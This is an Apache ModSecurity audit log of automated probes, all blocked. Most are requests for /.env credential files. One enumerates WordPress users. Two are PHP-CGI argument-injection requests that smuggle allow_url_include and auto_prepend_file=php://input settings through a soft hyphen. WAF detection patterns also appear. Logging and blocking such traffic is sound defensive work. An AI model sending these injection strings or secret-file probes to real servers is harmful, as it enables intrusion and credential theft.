Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7da6f626-Z-- --93fab063-A-- [02/May/2025:03:24:23 +0700] aBPYd_NNWdC6CAybkqPzEAAAANM 103.236.140.4 43222 103.236.140.4 8181 --93fab063-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; i1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36 Accept-Charset: utf-8 --93fab063-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93fab063-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746131063357376 1090 (- - -) Stopwatch2: 1746131063357376 1090; combined=538, p1=500, p2=0, p3=0, p4=0, p5=37, sr=166, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93fab063-Z-- --61e3ff1d-A-- [02/May/2025:04:21:45 +0700] aBPl6RXwRgnphTBdhpRSMgAAAJc 103.236.140.4 59990 103.236.140.4 8181 --61e3ff1d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 137.184.165.148 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 137.184.165.148 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --61e3ff1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61e3ff1d-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746134505426871 9431 (- - -) Stopwatch2: 1746134505426871 9431; combined=17754, p1=217, p2=0, p3=0, p4=0, p5=8788, sr=55, sw=1, l=0, gc=8748 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61e3ff1d-Z-- --0a13e060-A-- [02/May/2025:05:06:57 +0700] aBPwgfNNWdC6CAybkqP62QAAANA 103.236.140.4 42890 103.236.140.4 8181 --0a13e060-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.101 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/80.0.262003652 Mobile/16F203 Safari/604.1 Accept-Charset: utf-8 --0a13e060-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a13e060-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746137217853930 859 (- - -) Stopwatch2: 1746137217853930 859; combined=387, p1=349, p2=0, p3=0, p4=0, p5=38, sr=138, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a13e060-Z-- --13cfd503-A-- [02/May/2025:05:08:02 +0700] aBPwwqGyUvHV-cebb64ixQAAAEQ 103.236.140.4 43140 103.236.140.4 8181 --13cfd503-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.101 X-Forwarded-Proto: http Connection: close User-Agent: BlackBerry9700/5.0.0.351 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/123 Accept-Charset: utf-8 --13cfd503-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13cfd503-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746137282714874 802 (- - -) Stopwatch2: 1746137282714874 802; combined=295, p1=259, p2=0, p3=0, p4=0, p5=36, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13cfd503-Z-- --11b3e27f-A-- [02/May/2025:07:19:00 +0700] aBQPdBXwRgnphTBdhpRb4QAAAIA 103.236.140.4 45444 103.236.140.4 8181 --11b3e27f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: iTunes/9.0.2 (Windows; N) Accept-Charset: utf-8 --11b3e27f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11b3e27f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746145140067881 823 (- - -) Stopwatch2: 1746145140067881 823; combined=331, p1=292, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11b3e27f-Z-- --9809a253-A-- [02/May/2025:07:23:47 +0700] aBQQk6GyUvHV-cebb64qLwAAAEI 103.236.140.4 46554 103.236.140.4 8181 --9809a253-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaX7-00/021.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.21 Mobile Safari/533.4 3gpp-gba Accept-Charset: utf-8 --9809a253-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9809a253-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746145427898004 777 (- - -) Stopwatch2: 1746145427898004 777; combined=343, p1=305, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9809a253-Z-- --914cae2c-A-- [02/May/2025:07:24:12 +0700] aBQQrPNNWdC6CAybkqMDvQAAAMM 103.236.140.4 46650 103.236.140.4 8181 --914cae2c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://smkn22-jkt.sch.id Host: smkn22-jkt.sch.id X-Real-IP: 156.239.214.224 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.239.214.224 X-Forwarded-Proto: https Connection: close Origin: https://smkn22-jkt.sch.id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --914cae2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --914cae2c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746145452261576 2624 (- - -) Stopwatch2: 1746145452261576 2624; combined=1371, p1=438, p2=900, p3=0, p4=0, p5=33, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --914cae2c-Z-- --58c29a69-A-- [02/May/2025:09:23:55 +0700] aBQsu_NNWdC6CAybkqMFbAAAANQ 103.236.140.4 50742 103.236.140.4 8181 --58c29a69-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 137.184.165.148 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 137.184.165.148 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --58c29a69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58c29a69-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746152635460868 775 (- - -) Stopwatch2: 1746152635460868 775; combined=309, p1=269, p2=0, p3=0, p4=0, p5=39, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58c29a69-Z-- --f379157c-A-- [02/May/2025:11:26:37 +0700] aBRJfcwZl97WzW7hutNP0gAAAAA 103.236.140.4 52186 103.236.140.4 8181 --f379157c-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 157.245.36.108 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 157.245.36.108 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --f379157c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f379157c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746159997104216 856 (- - -) Stopwatch2: 1746159997104216 856; combined=293, p1=260, p2=0, p3=0, p4=0, p5=33, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f379157c-Z-- --5915c032-A-- [02/May/2025:11:53:33 +0700] aBRPzaGyUvHV-cebb64sAQAAAEE 103.236.140.4 52628 103.236.140.4 8181 --5915c032-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 34.34.185.61 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 34.34.185.61 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --5915c032-C-- --5915c032-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5915c032-E-- --5915c032-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746161613958851 5004 (- - -) Stopwatch2: 1746161613958851 5004; combined=3516, p1=484, p2=3001, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5915c032-Z-- --dcdf094f-A-- [02/May/2025:12:21:46 +0700] aBRWaswZl97WzW7hutNQCwAAABI 103.236.140.4 53034 103.236.140.4 8181 --dcdf094f-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 188.166.108.93 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 188.166.108.93 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --dcdf094f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dcdf094f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746163306035375 686 (- - -) Stopwatch2: 1746163306035375 686; combined=248, p1=215, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dcdf094f-Z-- --e378a714-A-- [02/May/2025:12:28:34 +0700] aBRYAqGyUvHV-cebb64sMgAAAFA 103.236.140.4 53124 103.236.140.4 8181 --e378a714-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 167.71.175.236 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 167.71.175.236 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --e378a714-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e378a714-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746163714336969 769 (- - -) Stopwatch2: 1746163714336969 769; combined=293, p1=260, p2=0, p3=0, p4=0, p5=33, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e378a714-Z-- --025ab419-A-- [02/May/2025:13:19:12 +0700] aBRj4BXwRgnphTBdhpReYwAAAIc 103.236.140.4 53778 103.236.140.4 8181 --025ab419-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 167.71.81.114 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 167.71.81.114 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --025ab419-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --025ab419-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746166752750360 827 (- - -) Stopwatch2: 1746166752750360 827; combined=353, p1=316, p2=0, p3=0, p4=0, p5=36, sr=96, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --025ab419-Z-- --1006dc01-A-- [02/May/2025:14:04:00 +0700] aBRuYPNNWdC6CAybkqMG-wAAAMc 103.236.140.4 54162 103.236.140.4 8181 --1006dc01-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 68.183.9.16 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 68.183.9.16 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --1006dc01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1006dc01-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746169440522541 793 (- - -) Stopwatch2: 1746169440522541 793; combined=316, p1=280, p2=0, p3=0, p4=0, p5=36, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1006dc01-Z-- --15265971-A-- [02/May/2025:15:31:48 +0700] aBSC9MwZl97WzW7hutNUGAAAAAI 103.236.140.4 36650 103.236.140.4 8181 --15265971-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 167.71.81.114 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 167.71.81.114 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --15265971-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15265971-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746174708326227 747 (- - -) Stopwatch2: 1746174708326227 747; combined=265, p1=237, p2=0, p3=0, p4=0, p5=28, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15265971-Z-- --0bcd6d3a-A-- [02/May/2025:15:56:31 +0700] aBSIv_NNWdC6CAybkqMJngAAAMQ 103.236.140.4 37322 103.236.140.4 8181 --0bcd6d3a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 112.78.36.210 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 112.78.36.210 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --0bcd6d3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0bcd6d3a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746176191107136 926 (- - -) Stopwatch2: 1746176191107136 926; combined=450, p1=411, p2=0, p3=0, p4=0, p5=38, sr=132, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0bcd6d3a-Z-- --aa3bfa08-A-- [02/May/2025:15:56:33 +0700] aBSIwaGyUvHV-cebb64vKAAAAFM 103.236.140.4 37326 103.236.140.4 8181 --aa3bfa08-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 112.78.36.210 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 112.78.36.210 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --aa3bfa08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa3bfa08-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746176193432174 700 (- - -) Stopwatch2: 1746176193432174 700; combined=300, p1=265, p2=0, p3=0, p4=0, p5=34, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa3bfa08-Z-- --73f8f256-A-- [02/May/2025:16:11:39 +0700] aBSMSxXwRgnphTBdhpRipQAAAIQ 103.236.140.4 37514 103.236.140.4 8181 --73f8f256-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.162 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --73f8f256-C-- --73f8f256-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73f8f256-E-- --73f8f256-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746177099953944 4365 (- - -) Stopwatch2: 1746177099953944 4365; combined=2819, p1=479, p2=2298, p3=0, p4=0, p5=41, sr=73, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73f8f256-Z-- --98b85937-A-- [02/May/2025:17:04:18 +0700] aBSYoswZl97WzW7hutNUygAAABQ 103.236.140.4 37954 103.236.140.4 8181 --98b85937-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 143.244.161.16 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 143.244.161.16 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --98b85937-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --98b85937-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746180258536437 830 (- - -) Stopwatch2: 1746180258536437 830; combined=344, p1=302, p2=0, p3=0, p4=0, p5=42, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --98b85937-Z-- --5936b573-A-- [02/May/2025:17:14:34 +0700] aBSbCswZl97WzW7hutNU1wAAABQ 103.236.140.4 38052 103.236.140.4 8181 --5936b573-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 64.23.218.208 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: 